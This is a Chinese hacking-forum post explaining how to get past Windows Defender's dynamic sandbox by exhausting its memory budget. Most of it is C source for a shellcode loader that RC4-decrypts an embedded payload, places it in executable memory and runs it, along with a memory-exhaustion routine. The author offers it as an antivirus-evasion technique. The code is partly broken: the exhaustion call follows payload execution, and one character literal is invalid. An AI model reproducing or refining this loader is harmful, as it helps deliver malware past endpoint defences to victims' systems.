论坛首页 > 技术文章投稿区 > 技术文章

利用资源消耗过DF动态检测

camer   ·   发表于 2023-05-05 16:21:47   ·   技术文章

0x01 前提

这种方法的使用是要你能够过静态检测,这很容易,只需要加密混淆即可。想要过windows defender就需要绕过这种动态杀箱检测,最简单朴素的办法就是去消耗它资源,因为windows defender去创建模拟的杀箱环境的时候,不可能让用户去等待很久,他的资源是有限的,不可能让用户等待很久,没有办法去做到整个内存的查查杀,也就说动态分析的资源是有限的。

0x02 实现

1、首先是创在一个耗资源的函数体

使用C语言编写的消耗资源的函数体,它会在循环中不断地分配内存并写入数据,直到内存耗尽为止:

  1. #include <stdlib.h>
  3. void consume_resources() {
  4.     while (1) {
  5.         // 分配1GB的内存
  6.         void* mem = malloc(1024 * 1024 * 1024);
  8.         // 如果分配失败,则退出循环
  9.         if (!mem) {
  10.             break;
  11.         }
  13.         // 填充内存
  14.         for (int i = 0; i < 1024 * 1024 * 1024; i++) {
  15.             *((char*)mem + i) = (char)i;
  16.         }
  17.     }
  18. }

该函数会在循环中不断地分配1GB的内存,并将其填充为递增的字节值,直到无法分配更多内存为止。

2、使用简单的分离shellcode加载器执行(下面是伪代码,删减过可能存在问题,原始代码我就不放了)

  1. #include <string.h>
  2. #include <windows.h>
  4. unsigned char Buf[] = "\x6d\xdc\xe0\x20\x34\x3b\xbc\x46....";
  6. // RC4-DEMO
  7. void RC4(unsigned char* Data, unsigned long Length, unsigned char* Key, unsigned long KeyLength)
  8. {
  9.     ......
  10. }
  13. // 资源消耗函数
  14. void consume_resources() {
  15.     while (1) {
  16.         // 分配1GB的内存
  17.         void* mem = malloc(1024 * 1024 * 1024);
  19.         // 如果分配失败,则退出循环
  20.         if (!mem) {
  21.             break;
  22.         }
  24.         // 填充内存
  25.         for (int i = 0; i < 1024 * 1024 * 1024; i++) {
  26.             *((char*)mem + i) = (char)i;
  27.         }
  28.     }
  29. }
  31. int main(int argc, char* argv[])
  32. {
  33.     unsigned char Key[256];
  35.     wchar_t fileName[MAX_PATH];
  37.     MultiByteToWideChar(CP_UTF8, 0, argv[1], -1, fileName, MAX_PATH);
  39.     if (fileName[0] == L'')
  40.     {
  41.         return 1;
  42.     }
  44.     // 打开文件
  45.     HANDLE hFile = CreateFileW(fileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  46.     if (hFile == INVALID_HANDLE_VALUE)
  47.     {
  48.         return 1;
  49.      }
  51.     // 读取文件内容
  52.     DWORD bytesRead;
  53.     if (!ReadFile(hFile, Key, sizeof(Key), &bytesRead, NULL) || bytesRead != sizeof(Key))
  54.     {
  55.         CloseHandle(hFile); 
  56.         return 1;
  57.     }
  58.     CloseHandle(hFile);
  60.     unsigned long buf_len = sizeof(Buf);
  61.     unsigned long key_len = sizeof(Key);
  63.     RC4(Buf, buf_len, Key, key_len);
  65.     LPVOID executableMemory = VirtualAlloc(NULL, buf_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  66.     memcpy(executableMemory, Buf, buf_len);
  68.     // 3. 执行ShellCode
  69.     ((void(*)())executableMemory)();
  71.         // 资源消耗
  72.     consume_resources();
  74.     // 4. 释放内存空间
  75.     VirtualFree(executableMemory, buf_len, MEM_RELEASE);
  77.     return 0;
  78. }


用户名金币积分时间理由
Track-子羽 40.00 0 2023-05-09 18:06:12 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2023-5-5 | 423 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.